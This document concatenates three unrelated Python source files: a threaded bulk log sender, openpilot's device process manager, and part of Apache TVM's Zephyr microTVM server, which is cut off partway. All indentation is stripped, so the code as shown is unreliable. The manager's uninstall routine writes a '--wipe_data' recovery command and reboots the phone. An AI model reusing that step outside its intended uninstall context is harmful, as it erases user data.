from __future__ import annotations
import json
import time
import urllib.parse
import sys
import requests
import threading
from queue import Queue
class IsuLogger:
def __init__(self, endpoint, appID):
self.endpoint = endpoint
self.appID = appID
self.queue = Queue()
self.logs = []
self.thread = threading.Thread(target=self._send_bulk)
self.thread.start()
def send(self, tag, data):
self.queue.put(
{
"tag": tag,
"time": time.strftime("%Y-%m-%dT%H:%M:%S+09:00"),
"data": data,
}
)
def _send_bulk(self):
while True:
while not self.queue.empty():
self.logs.append(self.queue.get())
if self.logs:
try:
self._request("/send_bulk", self.logs)
except Exception as e:
print(f"Catch bulk error {e}", file=sys.stderr)
else:
self.logs = []
time.sleep(2)
def _request(self, path, data):
url = urllib.parse.urljoin(self.endpoint, path)
body = json.dumps(data)
headers = {
"Content-Type": "application/json",
"Authorization": "Bearer " + self.appID,
}
res = requests.post(url, data=body, headers=headers)
res.raise_for_status()
|
manager.py
|
#!/usr/bin/env python3.7
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1195
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
else:
from common.spinner import FakeSpinner as Spinner
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (50.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
print(line.decode('utf8'))
except Exception:
pass
if scons.returncode != 0:
if retry:
print("scons build failed, cleaning in")
for i in range(3,-1,-1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
raise RuntimeError("scons build failed")
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.swaglog import cloudlog
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_frame
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
#"uploader": "selfdrive.loggerd.uploader",
#"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.controls.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
#"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
#"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
#"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": ("selfdrive/locationd", ["./paramsd"]),
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
#"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord', 'paramsd']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
'deleter',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc],
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start frame
if ANDROID:
pm_apply_packages('enable')
start_frame()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 50.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
# set unset params
if params.get("CommunityFeaturesToggle") is None:
params.put("CommunityFeaturesToggle", "0")
if params.get("CompletedTrainingVersion") is None:
params.put("CompletedTrainingVersion", "0")
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("HasCompletedSetup") is None:
params.put("HasCompletedSetup", "0")
if params.get("IsUploadRawEnabled") is None:
params.put("IsUploadRawEnabled", "1")
if params.get("IsLdwEnabled") is None:
params.put("IsLdwEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
if params.get("LimitSetSpeedNeural") is None:
params.put("LimitSetSpeedNeural", "0")
if params.get("LastUpdateTime") is None:
t = datetime.datetime.now().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
if params.get("OpenpilotEnabledToggle") is None:
params.put("OpenpilotEnabledToggle", "1")
if params.get("LaneChangeEnabled") is None:
params.put("LaneChangeEnabled", "1")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
microtvm_api_server.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import atexit
import collections
import collections.abc
import enum
import fcntl
import logging
import os
import os.path
import pathlib
import queue
import re
import select
import shlex
import shutil
import subprocess
import sys
import tarfile
import tempfile
import threading
import time
import serial
import serial.tools.list_ports
import yaml
from tvm.micro.project_api import server
_LOG = logging.getLogger(__name__)
API_SERVER_DIR = pathlib.Path(os.path.dirname(__file__) or os.path.getcwd())
BUILD_DIR = API_SERVER_DIR / "build"
MODEL_LIBRARY_FORMAT_RELPATH = "model.tar"
IS_TEMPLATE = not (API_SERVER_DIR / MODEL_LIBRARY_FORMAT_RELPATH).exists()
def check_call(cmd_args, *args, **kwargs):
cwd_str = "" if "cwd" not in kwargs else f" (in cwd: {kwargs['cwd']})"
_LOG.info("run%s: %s", cwd_str, " ".join(shlex.quote(a) for a in cmd_args))
return subprocess.check_call(cmd_args, *args, **kwargs)
CACHE_ENTRY_RE = re.compile(r"(?P<name>[^:]+):(?P<type>[^=]+)=(?P<value>.*)")
CMAKE_BOOL_MAP = dict(
[(k, True) for k in ("1", "ON", "YES", "TRUE", "Y")]
+ [(k, False) for k in ("0", "OFF", "NO", "FALSE", "N", "IGNORE", "NOTFOUND", "")]
)
class CMakeCache(collections.abc.Mapping):
def __init__(self, path):
self._path = path
self._dict = None
def __iter__(self):
return iter(self._dict)
def __getitem__(self, key):
if self._dict is None:
self._dict = self._read_cmake_cache()
return self._dict[key]
def __len__(self):
return len(self._dict)
def _read_cmake_cache(self):
"""Read a CMakeCache.txt-like file and return a dictionary of values."""
entries = collections.OrderedDict()
with open(self._path, encoding="utf-8") as f:
for line in f:
m = CACHE_ENTRY_RE.match(line.rstrip("\n"))
if not m:
continue
if m.group("type") == "BOOL":
value = CMAKE_BOOL_MAP[m.group("value").upper()]
else:
value = m.group("value")
entries[m.group("name")] = value
return entries
CMAKE_CACHE = CMakeCache(BUILD_DIR / "CMakeCache.txt")
class BoardError(Exception):
"""Raised when an attached board cannot be opened (i.e. missing /dev nodes, etc)."""
class BoardAutodetectFailed(Exception):
"""Raised when no attached hardware is found matching the board= given to ZephyrCompiler."""
def _get_flash_runner():
flash_runner = CMAKE_CACHE.get("ZEPHYR_BOARD_FLASH_RUNNER")
if flash_runner is not None:
return flash_runner
with open(CMAKE_CACHE["ZEPHYR_RUNNERS_YAML"]) as f:
doc = yaml.load(f, Loader=yaml.FullLoader)
return doc["flash-runner"]
def _get_device_args(options):
flash_runner = _get_flash_runner()
if flash_runner == "nrfjprog":
return _get_nrf_device_args(options)
if flash_runner == "openocd":
return _get_openocd_device_args(options)
raise BoardError(
f"Don't know how to find serial terminal for board {CMAKE_CACHE['BOARD']} with flash "
f"runner {flash_runner}"
)
# kwargs passed to usb.core.find to find attached boards for the openocd flash runner.
BOARD_USB_FIND_KW = {
"nucleo_l4r5zi": {"idVendor": 0x0483, "idProduct": 0x374B},
"nucleo_f746zg": {"idVendor": 0x0483, "idProduct": 0x374B},
"stm32f746g_disco": {"idVendor": 0x0483, "idProduct": 0x374B},
}
def openocd_serial(options):
"""Find the serial port to use for a board with OpenOCD flash strategy."""
if "openocd_serial" in options:
return options["openocd_serial"]
import usb # pylint: disable=import-outside-toplevel
find_kw = BOARD_USB_FIND_KW[CMAKE_CACHE["BOARD"]]
boards = usb.core.find(find_all=True, **find_kw)
serials = []
for b in boards:
serials.append(b.serial_number)
if len(serials) == 0:
raise BoardAutodetectFailed(f"No attached USB devices matching: {find_kw!r}")
serials.sort()
autodetected_openocd_serial = serials[0]
_LOG.debug("zephyr openocd driver: autodetected serial %s", serials[0])
return autodetected_openocd_serial
def _get_openocd_device_args(options):
return ["--serial", openocd_serial(options)]
def _get_nrf_device_args(options):
nrfjprog_args = ["nrfjprog", "--ids"]
nrfjprog_ids = subprocess.check_output(nrfjprog_args, encoding="utf-8")
if not nrfjprog_ids.strip("\n"):
raise BoardAutodetectFailed(f'No attached boards recognized by {" ".join(nrfjprog_args)}')
boards = nrfjprog_ids.split("\n")[:-1]
if len(boards) > 1:
if options["nrfjprog_snr"] is None:
raise BoardError(
"Multiple boards connected; specify one with nrfjprog_snr=: " f'{", ".join(boards)}'
)
if str(options["nrfjprog_snr"]) not in boards:
raise BoardError(
f"nrfjprog_snr ({options['nrfjprog_snr']}) not found in {nrfjprog_args}: {boards}"
)
return ["--snr", options["nrfjprog_snr"]]
if not boards:
return []
return ["--snr", boards[0]]
PROJECT_TYPES = []
if IS_TEMPLATE:
for d in (API_SERVER_DIR / "src").iterdir():
if d.is_dir():
PROJECT_TYPES.append(d.name)
PROJECT_OPTIONS = [
server.ProjectOption(
"extra_files",
help="If given, during generate_project, uncompress the tarball at this path into the project dir",
),
server.ProjectOption(
"gdbserver_port", help=("If given, port number to use when running the local gdbserver")
),
server.ProjectOption(
"nrfjprog_snr",
help=(
"When used with nRF targets, serial # of the " "attached board to use, from nrfjprog"
),
),
server.ProjectOption(
"openocd_serial",
help=("When used with OpenOCD targets, serial # of the " "attached board to use"),
),
server.ProjectOption(
"project_type",
help="Type of project to generate.",
choices=tuple(PROJECT_TYPES),
),
server.ProjectOption("verbose", help="Run build with verbose output"),
server.ProjectOption(
"west_cmd",
help=(
"Path to the west tool. If given, supersedes both the zephyr_base "
"option and ZEPHYR_BASE environment variable."
),
),
server.ProjectOption("zephyr_base", help="Path to the zephyr base directory."),
server.ProjectOption("zephyr_board", help="Name of the Zephyr board to build for"),
]
class Handler(server.ProjectAPIHandler):
def __init__(self):
super(Handler, self).__init__()
self._proc = None
def server_info_query(self, tvm_version):
return server.ServerInfo(
platform_name="zephyr",
is_template=IS_TEMPLATE,
model_library_format_path=""
if IS_TEMPLATE
else (API_SERVER_DIR / MODEL_LIBRARY_FORMAT_RELPATH),
project_options=PROJECT_OPTIONS,
)
# These files and directories will be recursively copied into generated projects from the CRT.
CRT_COPY_ITEMS = ("include", "Makefile", "src")
# Maps extra line added to prj.conf to a tuple or list of zephyr_board for which it is needed.
EXTRA_PRJ_CONF_DIRECTIVES = {
"CONFIG_TIMER_RANDOM_GENERATOR=y": (
"qemu_x86",
"qemu_riscv32",
"qemu_cortex_r5",
"qemu_riscv64",
),
"CONFIG_ENTROPY_GENERATOR_BOARDS=y": (
"mps2_an521",
"nrf5340dk_nrf5340_cpuapp",
"nucleo_f746zg",
"nucleo_l4r5zi",
"stm32f746g_disco",
),
}
def _create_prj_conf(self, project_dir, options):
with open(project_dir / "prj.conf", "w") as f:
f.write(
"# For UART used from main().\n"
"CONFIG_RING_BUFFER=y\n"
"CONFIG_UART_CONSOLE=n\n"
"CONFIG_UART_INTERRUPT_DRIVEN=y\n"
"\n"
)
f.write("# For TVMPlatformAbort().\n" "CONFIG_REBOOT=y\n" "\n")
if options["project_type"] == "host_driven":
f.write("# For RPC server C++ bindings.\n" "CONFIG_CPLUSPLUS=y\n" "\n")
f.write("# For math routines\n" "CONFIG_NEWLIB_LIBC=y\n" "\n")
if self._has_fpu(options["zephyr_board"]):
f.write("# For models with floating point.\n" "CONFIG_FPU=y\n" "\n")
main_stack_size = None
if self._is_qemu(options) and options["project_type"] == "host_driven":
main_stack_size = 1536
# Set main stack size, if needed.
if main_stack_size is not None:
f.write(f"CONFIG_MAIN_STACK_SIZE={main_stack_size}\n")
f.write("# For random number generation.\n" "CONFIG_TEST_RANDOM_GENERATOR=y\n")
f.write("\n# Extra prj.conf directives")
for line, board_list in self.EXTRA_PRJ_CONF_DIRECTIVES.items():
if options["zephyr_board"] in board_list:
f.write(f"{line}\n")
f.write("\n")
API_SERVER_CRT_LIBS_TOKEN = "<API_SERVER_CRT_LIBS>"
CRT_LIBS_BY_PROJECT_TYPE = {
"host_driven": "microtvm_rpc_server microtvm_rpc_common common",
"aot_demo": "aot_executor memory microtvm_rpc_common common",
}
def generate_project(self, model_library_format_path, standalone_crt_dir, project_dir, options):
project_dir = pathlib.Path(project_dir)
# Make project directory.
project_dir.mkdir()
# Copy ourselves to the generated project. TVM may perform further build steps on the generated project
# by launching the copy.
shutil.copy2(__file__, project_dir / os.path.basename(__file__))
# Place Model Library Format tarball in the special location, which this script uses to decide
# whether it's being invoked in a template or generated project.
project_model_library_format_tar_path = project_dir / MODEL_LIBRARY_FORMAT_RELPATH
shutil.copy2(model_library_format_path, project_model_library_format_tar_path)
# Extract Model Library Format tarball.into <project_dir>/model.
extract_path = os.path.splitext(project_model_library_format_tar_path)[0]
with tarfile.TarFile(project_model_library_format_tar_path) as tf:
os.makedirs(extract_path)
tf.extractall(path=extract_path)
if self._is_qemu(options):
shutil.copytree(API_SERVER_DIR / "qemu-hack", project_dir / "qemu-hack")
# Populate CRT.
crt_path = project_dir / "crt"
crt_path.mkdir()
for item in self.CRT_COPY_ITEMS:
src_path = os.path.join(standalone_crt_dir, item)
dst_path = crt_path / item
if os.path.isdir(src_path):
shutil.copytree(src_path, dst_path)
else:
shutil.copy2(src_path, dst_path)
# Populate Makefile.
with open(API_SERVER_DIR / "CMakeLists.txt.template", "r") as cmake_template_f:
with open(project_dir / "CMakeLists.txt", "w") as cmake_f:
for line in cmake_template_f:
if self.API_SERVER_CRT_LIBS_TOKEN in line:
crt_libs = self.CRT_LIBS_BY_PROJECT_TYPE[options["project_type"]]
line = line.replace("<API_SERVER_CRT_LIBS>", crt_libs)
cmake_f.write(line)
self._create_prj_conf(project_dir, options)
# Populate crt-config.h
crt_config_dir = project_dir / "crt_config"
crt_config_dir.mkdir()
shutil.copy2(
API_SERVER_DIR / "crt_config" / "crt_config.h", crt_config_dir / "crt_config.h"
)
# Populate src/
src_dir = project_dir / "src"
shutil.copytree(API_SERVER_DIR / "src" / options["project_type"], src_dir)
# Populate extra_files
if options.get("extra_files_tar"):
with tarfile.open(options["extra_files_tar"], mode="r:*") as tf:
tf.extractall(project_dir)
def build(self, options):
BUILD_DIR.mkdir()
cmake_args = ["cmake", ".."]
if options.get("verbose"):
cmake_args.append("-DCMAKE_VERBOSE_MAKEFILE:BOOL=TRUE")
if options.get("zephyr_base"):
cmake_args.append(f"-DZEPHYR_BASE:STRING={options['zephyr_base']}")
cmake_args.append(f"-DBOARD:STRING={options['zephyr_board']}")
check_call(cmake_args, cwd=BUILD_DIR)
args = ["make", "-j2"]
if options.get("verbose"):
args.append("VERBOSE=1")
check_call(args, cwd=BUILD_DIR)
# A list of all zephyr_board values which are known to launch using QEMU. Many platforms which
# launch through QEMU by default include "qemu" in their name. However, not all do. This list
# includes those tested platforms which do not include qemu.
_KNOWN_QEMU_ZEPHYR_BOARDS = ("mps2_an521",)
@classmethod
def _is_qemu(cls, options):
return (
"qemu" in options["zephyr_board"]
or options["zephyr_board"] in cls._KNOWN_QEMU_ZEPHYR_BOARDS
)
_KNOWN_FPU_ZEPHYR_BOARDS = (
"nucleo_f746zg",
"nucleo_l4r5zi",
"nrf5340dk_nrf5340_cpuapp",
"qemu_cortex_r5",
"qemu_riscv32",
"qemu_riscv64",
"qemu_x86",
"stm32f746g_disco",
)
@classmethod
def _has_fpu(cls, zephyr_board):
return zephyr_board in cls._KNOWN_FPU_ZEPHYR_BOARDS
def flash(self, options):
if self._is_qemu(options):
return # NOTE: qemu requires no flash step--it is launched from open_transport.
zephyr_board = options["zephyr_board"]
# The nRF5340DK requires an additional `nrfjprog --recover` before each flash cycle.
# This is because readback protection is enabled by default when this device is flashed.
# Otherwise, flashing may fail with an error such as the following:
# ERROR: The operation attempted is unavailable due to readback protection in
# ERROR: your device. Please use --recover to unlock the device.
if zephyr_board.startswith("nrf5340dk") and _get_flash_runner() == "nrfjprog":
recover_args = ["nrfjprog", "--recover"]
recover_args.extend(_get_nrf_device_args(options))
check_call(recover_args, cwd=API_SERVER_DIR / "build")
check_call(["make", "flash"], cwd=API_SERVER_DIR / "build")
def open_transport(self, options):
if self._is_qemu(options):
transport = ZephyrQemuTransport(options)
else:
transport = ZephyrSerialTransport(options)
to_return = transport.open()
self._transport = transport
atexit.register(lambda: self.close_transport())
return to_return
def close_transport(self):
if self._transport is not None:
self._transport.close()
self._transport = None
def read_transport(self, n, timeout_sec):
if self._transport is None:
raise server.TransportClosedError()
return self._transport.read(n, timeout_sec)
def write_transport(self, data, timeout_sec):
if self._transport is None:
raise server.TransportClosedError()
return self._transport.write(data, timeout_sec)
def _set_nonblock(fd):
flag = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flag | os.O_NONBLOCK)
new_flag = fcntl.fcntl(fd, fcntl.F_GETFL)
assert (new_flag & os.O_NONBLOCK) != 0, "Cannot set file descriptor {fd} to non-blocking"
class ZephyrSerialTransport:
@classmethod
def _lookup_baud_rate(cls, options):
zephyr_base = options.get("zephyr_base", os.environ["ZEPHYR_BASE"])
sys.path.insert(0, os.path.join(zephyr_base, "scripts", "dts"))
try:
import dtlib # pylint: disable=import-outside-toplevel
finally:
sys.path.pop(0)
dt_inst = dtlib.DT(BUILD_DIR / "zephyr" / "zephyr.dts")
uart_baud = (
dt_inst.get_node("/chosen")
.props["zephyr,console"]
.to_path()
.props["current-speed"]
.to_num()
)
_LOG.debug("zephyr transport: found UART baudrate from devicetree: %d", uart_baud)
return uart_baud
@classmethod
def _find_nrf_serial_port(cls, options):
com_ports = subprocess.check_output(
["nrfjprog", "--com"] + _get_device_args(options), encoding="utf-8"
)
ports_by_vcom = {}
for line in com_ports.split("\n")[:-1]:
parts = line.split()
ports_by_vcom[parts[2]] = parts[1]
return ports_by_vcom["VCOM2"]
@classmethod
def _find_openocd_serial_port(cls, options):
serial_number = openocd_serial(options)
ports = [p for p in serial.tools.list_ports.grep(serial_number)]
if len(ports) != 1:
raise Exception(
f"_find_openocd_serial_port: expected 1 port to match {serial_number}, "
f"found: {ports!r}"
)
return ports[0].device
@classmethod
def _find_serial_port(cls, options):
flash_runner = _get_flash_runner()
if flash_runner == "nrfjprog":
return cls._find_nrf_serial_port(options)
if flash_runner == "openocd":
return cls._find_openocd_serial_port(options)
raise FlashRunnerNotSupported(
f"Don't know how to deduce serial port for flash runner {flash_runner}"
)
def __init__(self, options):
self._options = options
self._port = None
def open(self):
port_path = self._find_serial_port(self._options)
self._port = serial.Serial(port_path, baudrate=self._lookup_baud_rate(self._options))
return server.TransportTimeouts(
session_start_retry_timeout_sec=2.0,
session_start_timeout_sec=5.0,
session_established_timeout_sec=5.0,
)
def close(self):
self._port.close()
self._port = None
def read(self, n, timeout_sec):
self._port.timeout = timeout_sec
to_return = self._port.read(n)
if not to_return:
raise server.IoTimeoutError()
return to_return
def write(self, data, timeout_sec):
self._port.write_timeout = timeout_sec
bytes_written = 0
while bytes_written < len(data):
n = self._port.write(data)
data = data[n:]
bytes_written += n
class ZephyrQemuMakeResult(enum.Enum):
QEMU_STARTED = "qemu_started"
MAKE_FAILED = "make_failed"
EOF = "eof"
class ZephyrQemuTransport:
"""The user-facing Zephyr QEMU transport class."""
def __init__(self, options):
self.options = options
self.proc = None
self.pipe_dir = None
self.read_fd = None
self.write_fd = None
self._queue = queue.Queue()
def open(self):
self.pipe_dir = pathlib.Path(tempfile.mkdtemp())
self.pipe = self.pipe_dir / "fifo"
self.write_pipe = self.pipe_dir / "fifo.in"
self.read_pipe = self.pipe_dir / "fifo.out"
os.mkfifo(self.write_pipe)
